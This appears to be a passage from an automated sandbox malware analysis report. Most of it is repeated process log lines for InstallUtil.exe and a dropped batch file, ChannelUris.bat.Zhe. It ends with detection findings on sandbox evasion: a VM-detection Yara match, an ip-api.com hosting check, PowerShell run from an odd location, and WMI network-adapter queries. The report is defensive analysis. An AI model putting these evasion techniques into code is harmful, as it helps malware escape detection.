Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\user\appdata\roaming\channeluris.bat.zhe	Key value queried: Powershell behavior			Jump to behavior
Source: c:\users\user\desktop\87m9y3p4z7.bat.zhe	Key value queried: Powershell behavior			Jump to behavior

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

